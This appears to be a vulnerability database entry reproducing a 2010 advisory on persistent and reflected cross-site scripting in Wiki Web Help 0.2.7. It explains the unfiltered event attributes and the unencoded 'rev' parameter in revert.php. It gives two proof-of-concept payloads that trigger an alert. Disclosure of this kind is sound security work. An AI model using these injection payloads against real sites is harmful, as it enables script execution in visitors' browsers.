Wiki Web Help 0.2.7 cross site scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050515 漏洞类型
发布时间 2010-07-02 更新时间 2010-07-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070016
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
------------------------------------------------------------------------
Software................Wiki Web Help 0.2.7
Vulnerability...........Persistent/Reflected XSS 
Download................http://sourceforge.net/projects/wwh/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to
execute arbitrary JavaScript.


--Exploit--

Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML
encode user submitted data.


--PoC--

Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E